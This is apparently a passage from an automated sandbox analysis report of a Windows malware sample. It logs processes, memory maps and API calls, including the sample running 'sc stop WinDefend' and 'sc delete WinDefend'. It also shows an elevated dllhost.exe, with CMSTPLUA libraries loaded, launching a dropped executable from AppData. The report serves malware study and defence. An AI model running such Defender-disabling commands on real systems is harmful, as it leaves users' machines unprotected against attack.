Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 54 True 1
Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 1 True 1
Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 1 True 1
Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 1 True 1
Fn
Data
Process #19: sc.exe
8 0
»
Information Value
ID #19
File Name c:\windows\syswow64\sc.exe
Command Line sc delete WinDefend
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:41, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:27
OS Process Information
»
Information Value
PID 0x9a4
Parent PID 0x77c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 9D4
0x 75C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
sc.exe.mui 0x00080000 0x0008ffff Memory Mapped File Readable, Writable False False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
locale.nls 0x000d0000 0x00136fff Memory Mapped File Readable False False False -
private_0x00000000001c0000 0x001c0000 0x001fffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x00200000 0x002bffff Memory Mapped File Readable, Writable False False False -
private_0x00000000002e0000 0x002e0000 0x002effff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x0044ffff Private Memory Readable, Writable True False False -
private_0x0000000000620000 0x00620000 0x0071ffff Private Memory Readable, Writable True False False -
sc.exe 0x00840000 0x0084bfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x9d4
8 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-25 14:54:41 (UTC) True 1
Fn
System Get Time type = Ticks, time = 269429 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\sc.exe, base_address = 0x840000 True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
Service Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
Service Open database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 51 True 1
Fn
Data
Process #20: sc.exe
8 0
»
Information Value
ID #20
File Name c:\windows\syswow64\sc.exe
Command Line sc stop WinDefend
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:41, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:27
OS Process Information
»
Information Value
PID 0x9d8
Parent PID 0x13c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A14
0x A50
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
sc.exe.mui 0x000f0000 0x000fffff Memory Mapped File Readable, Writable False False False -
private_0x0000000000190000 0x00190000 0x001cffff Private Memory Readable, Writable True False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x002c0000 0x0037ffff Memory Mapped File Readable, Writable False False False -
private_0x00000000003c0000 0x003c0000 0x003cffff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x0046ffff Private Memory Readable, Writable True False False -
private_0x00000000005a0000 0x005a0000 0x0069ffff Private Memory Readable, Writable True False False -
sc.exe 0x00840000 0x0084bfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0xa14
8 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-25 14:54:41 (UTC) True 1
Fn
System Get Time type = Ticks, time = 269273 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\sc.exe, base_address = 0x840000 True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
Service Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
Service Open database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 51 True 1
Fn
Data
Process #21: dllhost.exe
0 0
»
Information Value
ID #21
File Name c:\windows\syswow64\dllhost.exe
Command Line C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:46, Reason: RPC Server
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:22
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x200
Parent PID 0x248 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 6B8
0x 264
0x F8
0x 224
0x 788
0x 40C
0x 5DC
0x 794
0x 468
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000100000 0x00100000 0x00101fff Pagefile Backed Memory Readable True False False -
cversions.2.db 0x00110000 0x00113fff Memory Mapped File Readable True False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x00130000 0x0014efff Memory Mapped File Readable True False False -
private_0x0000000000150000 0x00150000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x001dffff Private Memory Readable, Writable True False False -
cversions.2.db 0x001e0000 0x001e3fff Memory Mapped File Readable True False False -
pagefile_0x00000000001f0000 0x001f0000 0x001f6fff Pagefile Backed Memory Readable True False False -
private_0x0000000000200000 0x00200000 0x0023ffff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0027ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000280000 0x00280000 0x00407fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000410000 0x00410000 0x00411fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000420000 0x00420000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x00000000004a0000 0x004a0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x0052ffff Private Memory Readable, Writable True False False -
private_0x0000000000530000 0x00530000 0x0056ffff Private Memory Readable, Writable True False False -
private_0x0000000000590000 0x00590000 0x005cffff Private Memory Readable, Writable True False False -
dllhost.exe 0x005d0000 0x005d4fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x00000000005e0000 0x005e0000 0x00760fff Pagefile Backed Memory Readable True False False -
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True False False -
private_0x00000000008a0000 0x008a0000 0x008dffff Private Memory Readable, Writable True False False -
private_0x00000000008e0000 0x008e0000 0x0091ffff Private Memory Readable, Writable True False False -
private_0x0000000000920000 0x00920000 0x0095ffff Private Memory Readable, Writable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db 0x00960000 0x0098ffff Memory Mapped File Readable True False False -
private_0x00000000009a0000 0x009a0000 0x009dffff Private Memory Readable, Writable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x009e0000 0x00a45fff Memory Mapped File Readable True False False -
private_0x0000000000a50000 0x00a50000 0x00a5ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000a60000 0x00a60000 0x01e5ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01e60000 0x0212efff Memory Mapped File Readable False False False -
private_0x00000000021a0000 0x021a0000 0x021dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000021e0000 0x021e0000 0x022befff Pagefile Backed Memory Readable True False False -
private_0x0000000002350000 0x02350000 0x0238ffff Private Memory Readable, Writable True False False -
private_0x0000000002400000 0x02400000 0x0243ffff Private Memory Readable, Writable True False False -
private_0x0000000002440000 0x02440000 0x0253ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002540000 0x02540000 0x02932fff Pagefile Backed Memory Readable True False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x743c0000 0x743cdfff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
shdocvw.dll 0x753c0000 0x753edfff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x75460000 0x754abfff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x754b0000 0x755a4fff Memory Mapped File Readable, Writable, Executable False False False -
cmlua.dll 0x755f0000 0x755fbfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x75600000 0x75608fff Memory Mapped File Readable, Writable, Executable False False False -
cmutil.dll 0x75610000 0x7561dfff Memory Mapped File Readable, Writable, Executable False False False -
cmstplua.dll 0x75620000 0x75627fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75870000 0x759a5fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x759b0000 0x759d6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75b30000 0x75b41fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x760c0000 0x7625cfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x772c0000 0x773b4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x77450000 0x7764afff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #22: oyvhkhw.exe
979 0
»
Information Value
ID #22
File Name c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe
Command Line "C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:46, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:22
OS Process Information
»
Information Value
PID 0x3d4
Parent PID 0x200 (c:\windows\syswow64\dllhost.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 6A0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
private_0x00000000000a0000 0x000a0000 0x000affff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory Readable True False False -
private_0x00000000000d0000 0x000d0000 0x0014ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000150000 0x00150000 0x00151fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x00161fff Private Memory Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x0027ffff Private Memory Readable, Writable True False False -
locale.nls 0x00280000 0x002e6fff Memory Mapped File Readable False False False -
private_0x00000000002f0000 0x002f0000 0x0039ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x002f0000 0x0032bfff Memory Mapped File Readable False False False -
~df0894a2d8a2a8bfc2.tmp 0x002f0000 0x0036ffff Memory Mapped File Readable, Writable True True False
private_0x0000000000390000 0x00390000 0x0039ffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x003effff Private Memory Readable, Writable True False False -
oyvhkhw.exe 0x00400000 0x00451fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000460000 0x00460000 0x0cabffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cac0000 0x0cac0000 0x0cc47fff Pagefile Backed Memory Readable True False False -
private_0x000000000cc60000 0x0cc60000 0x0cc6ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cc70000 0x0cc70000 0x0cdf0fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000ce00000 0x0ce00000 0x0e1fffff Pagefile Backed Memory Readable True False False -
private_0x000000000e200000 0x0e200000 0x0e5fffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x0e600000 0x0e8cefff Memory Mapped File Readable False False False -
private_0x000000000e8d0000 0x0e8d0000 0x0e97ffff Private Memory Readable, Writable True False False -
private_0x000000000e980000 0x0e980000 0x0eaeffff Private Memory Readable, Writable True False False -
pagefile_0x000000000e980000 0x0e980000 0x0ea5efff Pagefile Backed Memory Readable True False False -
private_0x000000000eab0000 0x0eab0000 0x0eaeffff Private Memory Readable, Writable True False False -
private_0x000000000eaf0000 0x0eaf0000 0x0ec6ffff Private Memory Readable, Writable True False False -
private_0x000000000eaf0000 0x0eaf0000 0x0eb6ffff Private Memory Readable, Writable True False False -
private_0x000000000ec30000 0x0ec30000 0x0ec6ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ec70000 0x0ec70000 0x0f06ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000000f070000 0x0f070000 0x0f462fff Pagefile Backed Memory Readable True False False -
staticcache.dat 0x0f470000 0x0fd9ffff Memory Mapped File Readable False False False -
private_0x000000000fda0000 0x0fda0000 0x0fe9ffff Private Memory Readable, Writable True False False -
asycfilt.dll 0x6fcd0000 0x6fce3fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ec0000 0x74ed2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x752d0000 0x7532efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
